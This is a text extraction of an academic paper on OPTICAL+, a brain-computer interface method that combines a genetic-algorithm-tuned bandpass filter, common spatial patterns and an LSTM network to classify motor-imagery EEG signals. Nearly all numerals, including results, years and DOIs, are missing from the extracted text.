recognizing different brain wave signals. adaptive filtering using genetic algorithm is incorporated for a hybrid system utilizing common spatial pattern and lstm network. the proposed method (optical+) achieved an overall average classification error rate of . % and a kappa coefficient value of . , outperforming the state-of-the-art methods. the proposed optical+ predictor can be used to develop improved hci systems that will aid in neurorehabilitation and may also be beneficial for sleep stage classification and seizure detection. subjects human-computer interaction, artificial intelligence, brain-computer interface keywords human-computer interaction (hci), brain wave, long short-term memory (lstm), common spatial pattern (csp), motor imagery (mi), informative frequency band (ifb) introduction a human–computer interaction (hci) system uses cutting-edge techniques for establishing direct communication between the human brain and a computer (li et al., ). hci has gained tremendous attention over the recent years with the major focus being in gaming and biomedical applications. an hci system, also widely known as a brain–computer interface (bci) system, converts the mental state (brain waves) of humans into computer commands which can be used by the disabled people to recover their environmental control capabilities (wang et al., ). it can also be used to detect pre-seizure activities (zhou et al., ) and sleep stages (yulita et al., ). the human brain waves are usually captured using electroencephalography (eeg) sensors, with non-invasive sensors preferred over invasive sensors due to the fact that surgery is required for invasive sensors and those non-invasive sensors can be integrated into wearable devices (mullen et al., ). however, the drawback of using non-invasive sensors is that it is how to cite this article kumar s, sharma r, sharma a. . optical+: a frequency-based deep learning scheme for recognizing brain wave signals. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published february corresponding author shiu kumar, shiu.kumar@fnu.ac.fj academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright kumar et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:shiu.�kumar@�fnu.�ac.�fj https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ prone to environmental noise, which results in the captured signal having a low signal-to- noise ratio (snr). therefore, it becomes quite a challenging task to recognize different categories of brain wave signals with high accuracy. the automatic classification of eeg signals is a significant step towards making the use of eeg more practical in applications and less dependent on the experts. the electrical potentials generated by the brain for different specific tasks are recorded from the scalp using eeg sensors. these signals are well structured, which makes it appropriate for machine learning. thus, a vast number of researchers have explored or proposed various traditional methods (abibullaev & zollanvari, ; borhani et al., ; chowdhury et al., ; jiao et al., ; kumar, sharma & tsunoda, a, b; mumtaz et al., ; utsumi et al., ; wang et al., ; xing et al., ; xu et al., ; zhang et al., ) aiming to build a system that has low complexity and a high recognition rate for classification of the brain wave signals. brain wave signals have gained recognition for a number of applications such as neuro-rehabilitation (chowdhury et al., ; neurostyle, ; zeng et al., ), sleep-stage classification (radha et al., ; xu et al., ), seizure detection (gao et al., ; zhou & li, ), emotion recognition (liu et al., ; yang et al., ) and biometric recognition where identification of individuals is done using their brain wave signals. for example, in damaševičius et al. ( ) the authors have proposed a biometric system that combines cryptography with eeg signals for recognizing different individuals. several authors have also explored the possibilities of data compression (rajasekar & pushpalatha, ) for reducing the bandwidth required in data transfer and feature selection or reduction approaches such as wave atom transform (martisius et al., ), feature selection using f-statistic values (peng et al., ) and locally-robust feature selection approach (yin et al., ). common spatial pattern (csp) and its variants (cheng, lu & wang, ; ramoser, muller-gerking & pfurtscheller, ) are the prevailing feature extraction methods for motor imagery (mi) eeg signal classification. filter bank csp (fbcsp) (ang et al., ), discriminative fbcsp (dfbcsp) (thomas et al., ), sparse filter band csp (sfbcsp) (zhang et al., ), and binary particle swarm optimization approach for frequency band selection (wei & wei, ) are few of the methods that utilize csp for feature extraction. these methods have focused on using multiple filter bands and in some cases finding individual-dependent frequency bands that would produce good classification ability. several other approaches have also been proposed using csp for extracting potentially significant features from the eeg signals after performing certain analysis. however, the eeg features vary over time and differ significantly in different individuals (blankertz et al., ). thus, there has been an ever-increasing demand for robust and more general feature extraction techniques. a number of approaches have been proposed based on deep learning (convolutional neural networks—cnn (wu et al., ; yuksel & olmez, ) and long short-term memory network (lstm) (kumar, sharma & tsunoda, a)), feature priority and selection (li & feng, ; luo et al., ), empirical mode decomposition (gaur et al., ; mingai et al., ), wavelet packet decomposition (yang et al., ), hjorth parameters (türk et al., ), tangent space mapping (kumar, mamun & sharma, ) kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and channel selection (ghaemi et al., ). while these approaches have aimed to increase the classification accuracy to some extent, their performance is still limited because the eeg signals acquired from the scalp using non-invasive sensors usually have low snr. a signal with low snr contains a lot of unwanted noise which degrades the performance of an algorithm in recognizing the different categories of the brain wave signals. one way to obtain an eeg signal with better quality, that is, a signal with good snr is by using invasive sensors. however, invasive sensors require surgery, which is not preferred by many people and is rarely used for hci applications. therefore, there is a need to enhance the quality of the signal acquired using non-invasive sensors such that it contains useful information that can aid in recognizing the different categories of the mi eeg signals. several methods have been proposed for artifact removal, amongst which is a recently proposed movement artifact removal approach for eeg analysis in sports exercise (butkevičiūtė et al., ). however, one of the simple methods to remove the artifacts or unwanted noise is by filtering. the responsive frequency band differs from one individual to another (ang et al., ; kumar, sharma & tsunoda, ; novi et al., ; poli, kennedy & blackwell, ) due to different skull size, skin thickness and the fact that the way one individual thinks about a task differs from the way another individual thinks about the same task. therefore, using a fixed filter band will not produce a signal of the best quality. moreover, manually tuning the filter bank for each individual is a tedious and time-consuming task. thus, a method that automatically finds the subject-dependent filter band that will produce the most responsive signal is desired. the authors in wei & wei ( ) have employed binary particle swarm optimization algorithm for selecting the best frequency band(s) from overlapping sub-bands for the classification of motor imagery eeg signals. although performance improvement has been achieved, multiple sub-bands can be selected which will increase the computation time of the system. on the other hand, the sub-bands are pre-defined and as such this approach might ignore some important information. in wodecki, michalak & zimroz ( ), the authors have used progressive genetic algorithm (ga) for optimal filter design for vibration signal analysis. the informative frequency band (ifb) that contains the most information about the damage depends on many factors, such as kinematic structure, operational conditions, type of damage and its location within the machine and thus the progressive ga algorithm has been proposed for finding the ifb. the filter coefficients of a linear phase digital finite impulse response filter is optimized with no restriction on the search space of the filter coefficients, which will increase the time taken to search for the optimal filter. therefore, in order to address these issues, we propose a simple yet an effective adaptive filtering approach to obtain the signal that is of the best quality and combine it with our previous work (kumar, sharma & tsunoda, a) to obtain a predictor called optical+ which is able to outperform the state-of-the-art methods. in optical+, we use ga to optimize the parameters of a butterworth bandpass filter, which finds the most ifb for each individual using which the most responsive signal can be obtained. filtering the signal using this frequency band aids in reducing the unwanted noise while retaining the useful information contained in the signal. thus, a signal that captures most of the useful information needed to recognize the different categories of kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mi-eeg signals will be obtained. this helps in obtaining features that are discriminative. after filtering, the features generated using csp and lstm are used to train a support vector machine (svm) classifier. this trained svm model is then used to classify the test samples. the contributions of this work can be summarized as follows: � a single adaptive butterworth filter is employed that is tuned using the ga algorithm for finding the ifb specific to each individual, which results in an improved performance in terms of brain wave classification. the search space is kept to a minimum of three parameters (filter order and upper and lower cutoff frequencies) to be able to find the parameters of the adaptive filter in the shortest possible time. � the adaptive filter is integrated with the optical predictor, resulting in a new predictor named optical+, which can enhance the overall classification ability of the system. the proposed adaptive filter can be easily integrated with other methods to offer a better classification performance. the rest of the article is organized as follows. the next section describes the dataset used and the proposed method. the results are presented and discussed in “results and discussion”. finally, the paper ends with conclusions and future recommendations. materials and methods in this section, we present a brief description of the dataset that has been used to evaluate the proposed method, followed by a detailed description of the proposed optical+ predictor. dataset description the publicly available gigadb dataset (cho et al., ) has been used in this work. it contains eeg signals for mi tasks recorded from healthy subjects ( males and females). data was collected as previously described in kumar, sharma & tsunoda ( a). specifically, data was acquired at a sampling rate of hz using ag/agcl active electrodes placed around the scalp based on the international - system. the eeg signals were recorded for the following tasks: left and right hand mi tasks, eyeball movement left/right, eyeball movement up/down, eye blinking, jaw clenching, head movement, and rest state. for each subject, either or trials of each of the left and right hand mi tasks were recorded. out of the subjects, the data of subjects are well-discriminated while the remaining subject’s data is less discriminated. in this work, we have used the eeg signals for the left and right hand mi tasks. a detailed description of the dataset can be found online (cho et al., ). methods deep learning has been widely used in mi classification and has achieved satisfactory results. to make full use of the feature information, we propose a frequency-based approach embedded into the lstm network, while also making use of the commonly used csp approach for feature extraction. the overall framework of the proposed optical+ kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ predictor is shown in fig. . ga is first initialized with random parameters having a population size of . two sets of spatial filters are then learned from the training samples. the first set of spatial filters is learned directly from the original training samples, while the second set of spatial filters is learned using the segmented data as shown is fig. . csp features are then obtained from both the spatially filtered data. the csp features obtained from the first set of spatially filtered data becomes the first set of features to the svm model. on the other hand, the csp features extracted from the second set of spatially filtered data is fed as the sequence input to the lstm network for training the model. the output of the lstm network is a regression layer, which also becomes one of the features to the svm model. thus, the svm model is trained using the training samples and evaluated using the evaluation samples. during this process of ga searching for the best filter parameters, -fold cross-validation is used for training and evaluating the performance of the selected filter parameters. thus, the value of the fitness function is the average of the error rates obtained from the -folds. in this way, fitness function values are obtained (one for each chromosome) during each phase of the fitness function evaluation. the ga search is carried out for iterations unless an error rate of zero is achieved (in this case the search process of ga will stop) and the best parameters will be determined. once the three filter parameters have been determined, all the training data is filtered using the adaptive filter that is learned, the spatial filters are again computed and the lstm and svm model is retrained. these spatial filters and trained models are figure conceptual framework of the proposed optical+ predictor. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ then used during the test phase for classifying the new test samples. the following sub- sections present each of the phase of the proposed method in more detail. adaptive filtering pre-processing the signals to obtain a clean signal is a fundamental concept for any signal processing approach. one of the key methods of obtaining a good quality eeg signal from the raw eeg data is through filtering. the eeg signal that will contain important mi task information usually lies between . hz and hz. however, the actual frequency range that will provide important information about the different mi tasks varies amongst different individuals. this fact paves the way to develop methods that can automatically learn or find the ifb. while the use of multiple frequency bands has been proposed (ang et al., ; thomas et al., ), it increases the computational complexity of the system. therefore, we propose the use of a single adaptive filter band using ga. the bandpass butterworth filter has been utilized in this work due to the lower number of parameters that needs to be selected, which keeps the search space small. however, other filters can also be used with our proposed method. the three parameters that were tuned for the adaptive filter were the filter order, upper cutoff frequency and lower cutoff frequency. -fold cross-validation is performed on training data to search for the filter parameters that would result in the optimal performance of the proposed system. the adaptive filter parameters found are then used to filter the test data. genetic algorithm genetic algorithm (ga) is an iterative search procedure based on natural selection and genetics that is widely used for optimization and search problems. a d dimensional population of chromosomes representing the possible solutions is generated randomly, where d depends on the number of parameters to be optimized. in this work, we optimized d = parameters (filter order, upper cutoff frequency and lower cutoff frequency). this first generation of the solutions is referred to as the parents. only a few parents are then selected, from which children are generated using the cross-over method. several methods such as roulette wheel selection, rank selection, tournament selection, stochastic universal sampling and random selection can be used for selecting the parents. we have utilized the tournament selection approach for selecting the parents. mutants are then formed by performing mutation on several randomly selected parents. the chromosomes that survive during the process of survivor selection become the parents in the next iteration. this process is repeated until the desired fitness condition or the desired number of iterations are reached. the chromosome that gives the best fitness value is selected and used to set the filter parameters of the adaptive filter for final training and testing. common spatial pattern common spatial pattern (csp) is one of the major approaches used for feature extraction of mi-eeg signals. it projects the signal onto a new time series, where the variance of one class of signals is maximized while the variance of the other class of signals is minimized. refer to kumar et al. ( ) for a detailed explanation of the csp algorithm. kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ given an input signal en rc � t, the spatially filtered signal can be obtained using ( ), where n represents the n-th trial, c represents the number of channels and t is the number of sample points. the csp variance-based features are then extracted using ( ), where êin represents the i-th row of ên. in this work, we have selected spatial filters (m = ), therefore, csp variance-based features are obtained. ên ¼ wtcsp en ( ) fn ¼ log varðêinÞp m j¼ varðê j nÞ ! ( ) long short-term memory network deep learning has been increasingly applied for solving real-life applications with good performance. usually, deep learning methods such as convolutional neural networks were applied to image data. however, recurrent neural networks (rnn) such as lstm are used for learning time series data. the long-term information of time series data can be stored by the lstm network, and later used together with the current data to generate the output. the eeg signal architecture comprises of common temporal patterns when mi tasks are not performed. therefore, non-temporal techniques may not be able to achieve optimal performance due to the shortfall that they will not be able to exploit the dependency between the time steps (i.e., current and past data) (radha et al., ). recurrent models such as lstm are able to tackle this problem that normal rnn’s can’t by learning short-term dependencies for a very long time. thus, we utilize an lstm network in this work, which is a rnn that has an lstm layer. the lstm network architecture used in this work is shown in fig. . the input to the network is a sequence input, followed by lstm layers, the fully connected layer and a regression layer at the output. the sequence input layer is used to provide the time series or sequence input to the network. the lstm layer learns long-term dependencies between a series of sequence data. the lstm layer architecture used in this work is shown in fig. , which shows how the d-dimensional sequence input matrix f with a length of s flows through the lstm layer. the fiwj represents the sequence input where i denotes the i-th feature obtained from the j-th windowed segment of the respective trial (details on how to obtain sequence input matrix can be found in our previous work (kumar, sharma & tsunoda, a)). the h and c denote the hidden/output states and cell states, respectively. the initial state of the network and the first sequence input fiw becomes the input for the first lstm block, which computes the first output h and c (updated cell states). st lstm layer nd lstm layer fully connected layer regression output layer sequence input layer figure the lstm network architecture used in optical+ predictor. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the lstm blocks in between the first and last lstm block takes fiw sequence input and current states of the network (ct− , ht− ) for the t-th lstm block for computing the updated output state ht and the updated cell state ct. information that is learned from previous sequence inputs are contained by the cell states. information is added or removed (update controlled using gates) from the cell states at each step of the sequence input. an lstm architecture usually consists of four main parts; the input gate, memory cell, forget gate and the output gate. the values (states) are remembered or stored by the memory cells for either short or long times. the function of the input gate is to control the degree to which new data or information can flow into the cell of the lstm layer, the purpose of the forget gate is to control the degree to which certain value or information remains in the cell of the lstm layer, while the function of the output gate is to control the amount of stored information that is utilized for computing the output activation. figure shows how the data flows through the lstm block for the t-th step of the input sequence. the input weights w, recurrent weights r and bias b are the weights that are learned by the lstm layer. the cell state at step t of the input sequence is calculated by ct ¼ ft � ct� þ it � gt while the hidden/output state is calculated by ht ¼ ot � rc ctð Þ ht ¼ ot � sc ctð Þ, where i, f, g and o denotes the input gate, forget gate, cell candidate and output gate, respectively. the (·) operator represents the element-wise multiplication (hadamard product operator) and σc i wf i wf i wt f iwsf lstm block lstm block lstm block lstm block co ho lstm layer final updated state initial state h h ht hs . . . . . . figure the lstm layer architecture used in optical+ predictor. full-size doi: . /peerj-cs. /fig- figure diagram showing the flow of data through the lstm block for t-th step of the input sequence (mathworks, ). full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ denotes the state activation function. each of the components at sequence input t is calculated using eqs. ( )–( ). the tangent hyperbolic function has been used as the state activation function, sc xð Þ ¼ tanh xð Þ while the sigmoid function is used as the gate activation function, sg xð Þ ¼ þ e�xð Þ� . it ¼ rg wixt þ riht� þ bið Þ ( ) ft ¼ rg wf xt þ rf ht� þ bf � � ( ) gt ¼ rc wgxt þ rght� þ bg � � ( ) ot ¼ rg woxt þ roht� þ boð Þ ( ) results and discussion in order to evaluate the feasibility and performance of the proposed system, experiments have been conducted using the gigadb dataset. these experiments are conducted using matlab running on a personal computer at . ghz with intel(r) core(tm) i processor. the gigadb dataset is used to evaluate the proposed method as it has a large number of individuals ( individuals) and would generalize well for comparing the performance of the different methods. we extracted s window signal after the visual cue was presented to obtain trial data for the different mi tasks (left hand and right hand) as done in other related works (cho et al., ; kumar & sharma, ; kumar, sharma & tsunoda, , b; zhang et al., ). basic pre-processing is performed, where common average referencing is applied to all the trials. the performance measures that are used to evaluate the performance of the proposed system are the error rate (% of samples that are misclassified), sensitivity, specificity, and cohen’s kappa index (κ). the error rate shows the percentage of trials that are incorrectly classified. the sensitivity and specificity shows the ability of the classifier or model to correctly classify the positive and negative trials, respectively. the cohen’s kappa index is used to measure the reliability of the classifier and a higher value signifies that the system is more reliable. results for a fair comparison, all the methods have been implemented and the results obtained using × -fold cross-validation scheme is reported. table shows the comparison of the × -fold cross-validation results of the proposed optical+ predictor with the other state-of-the-art methods. it can be noted from table that the proposed method outperformed all the other methods in terms of the error rate, sensitivity, specificity and κ. it shows that our proposed method is reliable and more robust as it achieved the highest κ value. our proposed method outperformed the top performing optical method by . %, . %, . %, and . % in terms of the error rate, kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sensitivity, specificity and κ, respectively. the results for the individual subjects can be found in the supplemental materials. out of the subjects, subjects achieved the lowest error rate using the proposed approach. this is the highest number of subjects achieving the lowest error rates using a particular method with i-dfbcsp achieving the second-highest number of subjects ( subjects) with the lowest error rates. compared to the optical method, the error rates for subjects improved using the optical+ method with the highest improvement being a % decrease in the error rate (subject ). we also present the results of the individual subjects for our proposed optical+ predictor in fig. , where the error bars represent the % confidence interval. the results of the individual subjects for the other competing methods can be found in the supplemental material. it can be noted that our proposed method achieved the lowest width of the % confidence interval for out of subjects. this number is higher than table × -fold cross-validation results of the different methods. method number of filters error rate sensitivity specificity κ csp . . . . dfbcsp [ ] . . . . sblfb [ ] . . . . csp-tsm [ ] . . . . sftofsrc [ ] . . . . ss-memdbf [ ] . . . . tfpo-csp [ ] . . . . i-dfbcsp [ ] . . . . optical [ ] . . . . optical+ . . . . etarrorre egatnecrep subject figure error rates of the individual subjects for the proposed optical+ predictor. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that of any other competing methods. over % of the subjects have a width of % confidence interval of less than ± . %. this shows that our proposed method can produce similar results if repeated under the same conditions. thus, we can say that the proposed optical+ predictor is reliable as it achieved the lowest average width of % confidence interval showing that the proposed optical+ predictor has the lowest variation around its reported statistical mean. discussion the proposed optical+ predictor outperformed all the other state-of-the-art methods. the gigadb dataset has been used to evaluate all the methods as it has a large number of subjects ( subjects) and using this dataset shows the reliability and robustness of the approaches. reliability in this work specifically refers to the degree to which a test produces similar results under consistent conditions and robustness refers to the strength of the approach. it is worth noting that approaches such as dfbcsp, sftofsrc, csp-tsm and ss-memdbf have shown to perform well on small datasets (bci competition datasets). however, they did not perform well on the gigadb dataset. on the other hand, the proposed optical+ predictor generalized well compared to these methods, showing that it is a more reliable and robust predictor for predicting the mi-eeg signals since it achieved the highest κ value. we say that our proposed system is more reliable because it is able to generate similar results under consistent conditions obtaining the lowest average standard deviation of . in comparison with the other competing methods. on the other hand, we argue that our approach is more robust in comparison to other methods as it is able to perform well (obtaining lowest error rate) for a substantial number of subjects ( out of subjects). this is considerably higher than the other methods as the number of subjects for which the competing methods obtained the lowest error rate are as follows: csp— , sblfb— , tfpo-csp— , i-dfbcsp— and optical— . moreover, to show that the performance improvement achieved by our proposed optical+ predictor is significant, paired t-test with a significance level of . has been performed. the results of the individual subjects for the proposed optical+ predictor and the results of the individual subjects for the optical and tfpo-csp predictors have been used to perform the paired t-test. the p-values obtained were . and . , respectively. this indicates that a significant performance improvement has been achieved using the proposed optical+ predictor as the p-values obtained are < . . figure presents the distribution of the best two features for the csp , optical and the proposed optical+ method that was obtained using one of the trial runs of subject . it can noted from fig. that more separable features are obtained by the proposed optical+ predictor in comparison to the conventional csp and optical methods, thus, accounting for the enhanced performance of the proposed optical+ predictor. this is due to the optimization of the filter parameters, which results in the signal containing significant information while filtering out most of the redundant information. this leads to learning better csp spatial filters that project data onto a new time series kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure distribution of the best two csp features obtained using conventional csp approach and proposed method. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ which are more separable, thus resulting in improved performance. the spatial filters learned from one of the trial runs of subject are shown in fig. for with and without optimization of the filter parameters. figure demonstrates that the csp spatial filters learned when the filter parameters are optimized (optical+ spatial filters) were better than the csp spatial filters learned when the filter parameters were not optimized as figure the six spatial filters learned by the conventional csp approach (a–f) and the proposed optical+ predictor (g–l) for subject (for one of the trial runs). full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ they were able to project the data to a new time series with the projected signal having more discrimination between the two mi tasks. this is evident, as fig. shows that the features learned from optical+ are more separable, resulting in higher classification accuracy. furthermore, we also performed experiments whereby we optimized the filter parameters followed by the optimization of the lstm network using bayesian optimization. the results for the individual subjects compared with the proposed optical+ predictor is shown in fig. . the error rate for most of the subjects increased compared to the optical+ predictor. the overall performance of the system did not improve as the average error rate increased to . %. this may be mainly due to over-fitting as both the filter parameters and the lstm networks hyper-parameters were optimized consecutively and as such, this approach was not adopted. in future, we will perform further experiments to see if performance improvements can be achieved by simultaneously optimizing both the filter parameters and the lstm hyperparameters. further works will be carried out in future where multiple sub-bands will be tested. also, since convolutional neural network (cnn) has gained a lot of attention over the recent years, we will evaluate the use of cnn for mi-eeg signal classification by developing a hybrid model utilizing cnn with optical+. moreover, cnn works well on image data, therefore, method such as deepinsight (sharma et al., ) can be used to transform the eeg signal to image before being fed as input to the cnn model. to add on, we have employed an lstm network with peephole connections in this work. however, in future we will also consider the lstm network with gated recurrent units, multiplicative lstm (krause et al., ) and lstm networks with attention. all models trained in this work are subject-dependent, which is in agreement with the related works. moreover, we have used ga in this work to demonstrate the significance figure the error rates of optical predictor with optimization of the filter parameters and optical+ predictor. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of optimizing the filter band parameters. however, any other optimization algorithm can be employed with the proposed optical+ predictor. furthermore, in future, we also intend to test how the proposed method would perform on other eeg signal classification tasks, such as sleep stage classification and seizure classification. moreover, although our proposed approach has outperformed other competing methods on various performance measures, it does have some limitations. one of the limitations of the proposed optical+ predictor is that we have used a population size of with three parameters to be optimized. this results in an average time of about minutes for finding the optimal parameters of the adaptive filter. this means that if any other filter that will require more parameters to be tuned is used, then it will lead to even higher training time. thus, higher computational resources will be required for training. however, we believe this is not a major limitation due to the fact that training can be done offline and the trained model can then be deployed to the preferred device to be used for real-time operation. this is because the time required to process and classify a test signal using the trained model is . ms. there is also a possibility that during the process of searching for the optimal filter parameters, the search might get stuck with the local maximum and is not able to find the optimal solution. to alleviate this possibility, higher population size can be used. however, this will again result in higher computational time and a need for higher computational resources. conclusions the proposed method has been able to successfully optimize the filter band parameters that accounts for its improved performance in comparison to the other state-of-the-art methods. optical+ achieved the lowest error rate of . %, which is an improvement of . % compared to the optical predictor and an improvement of . % compared to the conventional wide-band csp approach. on the other hand, optical+ also achieved the highest average sensitivity and specificity of . % and . %, respectively. this shows that our proposed predictor is able to correctly classify more positive and negative samples, which in turn has resulted in the decrease in the error rate. furthermore, optical+ achieved the highest κ value of . , an improvement of . % compared to that of the optical predictor. to add on, the proposed optical+ predictor achieved the lowest error rate for out of the subjects. this shows that apart from performing well in terms of the error rate, specificity, sensitivity and κ value, optical+ is also a robust and reliable predictor. the best performance by other methods in terms of the number of subjects that obtained the lowest error rate was by i-dfbcsp method ( out of subjects). this shows that the proposed predictor is more reliable as it performed well for most of the subjects on a larger dataset consisting of subjects. therefore, optical+ can be used to potentially develop improved hci systems using eeg signals. moreover, it can also be useful for other applications requiring eeg signal classification, such as various sleep stage classification and seizure detection. kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this research work was supported by the university research committee, fiji national university, fiji. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university research committee, fiji national university, fiji. competing interests the authors declare that they have no competing interests. author contributions � shiu kumar conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � ronesh sharma conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � alok sharma conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data is available at gigascience: cho h; ahn m; ahn s; kwon m; jun sc ( ): supporting data for “eeg datasets for motor imagery brain computer interface” gigascience database. doi . / the database contains matlab files named s'#'.mat and it requires matlab a or a newer, preferably bit operating system. the source code is available at github: https://github.com/shiukumar/optical_plus. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abibullaev b, zollanvari a. . learning discriminative spatiospectral features of erps for accurate brain-computer interfaces. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . ang kk, chin zy, zhang h, guan c. . filter bank common spatial pattern (fbcsp) in brain- computer interface. in: ieee international joint conference on neural networks (ieee world congress on computational intelligence). hong kong, – . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / https://github.com/shiukumar/optical_plus http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jbhi. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blankertz b, sannelli c, halder s, hammer em, kübler a, müller k-r, curio g, dickhaus t. . neurophysiological predictor of smr-based bci performance. neuroimage ( ): – doi . /j.neuroimage. . . . borhani s, kilmarx j, saffo d, ng l, abiri r, zhao x. . optimizing prediction model for a noninvasive brain-computer interface platform using channel selection, classification, and regression. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . butkevičiūtė e, bikulčienė l, sidekerskienė t, blažauskas t, maskeliūnas r, damaševičius r, wei w. . removal of movement artefact for mobile eeg analysis in sports exercises. ieee access : – doi . /access. . . cheng m, lu z, wang h. . regularized common spatial patterns with subject-to-subject transfer of eeg signals. cognitive neurodynamics ( ): – doi . /s - - -x. cho h, ahn m, ahn s, kwon m, jun sc. . eeg datasets for motor imagery brain-computer interface. gigascience ( ): – doi . /gigascience/gix . chowdhury a, raza h, meena yk, dutta a, prasad g. . an eeg-emg correlation-based brain-computer interface for hand orthosis supported neuro-rehabilitation. journal of neuroscience methods : – doi . /j.jneumeth. . . . damaševičius r, maskeliūnas r, kazanavičius e, woźniak m. . combining cryptography with eeg biometrics. computational intelligence and neuroscience ( ): doi . / / . gao y, gao b, chen q, liu j, zhang y. . deep convolutional neural network-based epileptic electroencephalogram (eeg) signal classification. frontiers in neurology : doi . /fneur. . . gaur p, pachori rb, wang h, prasad g. . a multi-class eeg-based bci classification using multivariate empirical mode decomposition based filtering and riemannian geometry. expert systems with applications : – doi . /j.eswa. . . . ghaemi a, rashedi e, pourrahimi am, kamandar m, rahdari f. . automatic channel selection in eeg signals for classification of left or right hand movement in brain computer interfaces using improved binary gravitation search algorithm. biomedical signal processing and control : – doi . /j.bspc. . . . jiao y, zhang y, chen x, yin e, jin j, wang x, cichocki a. . sparse group representation model for motor imagery eeg classification. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . krause b, lu l, murray i, renals s. . multiplicative lstm for sequence modelling. available at https://arxiv.org/abs/ . . kumar s, mamun k, sharma a. . csp-tsm: optimizing the performance of riemannian tangent space mapping using common spatial pattern for mi-bci. computers in biology and medicine : – doi . /j.compbiomed. . . . kumar s, sharma a. . a new parameter tuning approach for enhanced motor imagery eeg signal classification. medical & biological engineering & computing ( ): – doi . /s - - - . kumar s, sharma a, tsunoda t. . an improved discriminative filter bank selection approach for motor imagery eeg signal classification using mutual information. bmc bioinformatics (s ): doi . /s - - - . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /jbhi. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /gigascience/gix http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /fneur. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . /jbhi. . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kumar s, sharma a, tsunoda t. a. brain wave classification using long short-term memory network based optical predictor. scientific reports ( ): doi . /s - - - . kumar s, sharma a, tsunoda t. b. subject-specific-frequency-band for motor imagery eeg signal recognition based on common spatial spectral pattern. in: lecture notes in artificial intelligence: sub-series of lecture notes in computer science. . kumar s, sharma r, sharma a, tsunoda t. . decimation filter with common spatial pattern and fishers discriminant analysis for motor imagery classification. in: international joint conference on neural networks (ijcnn). vancouver, canada, – . li s, feng h. . eeg signal classification method based on feature priority analysis and cnn. in: international conference on communications, information system and computer engineering (cisce). – . li y, pan j, long j, yu t, wang f, yu z, wu w. . multimodal bcis: target detection, multidimensional control, and awareness evaluation in patients with disorder of consciousness. proceedings of the ieee ( ): – doi . /jproc. . . liu j, wu g, luo y, qiu s, yang s, li w, bi y. . eeg-based emotion classification using a deep neural network and sparse autoencoder. frontiers in systems 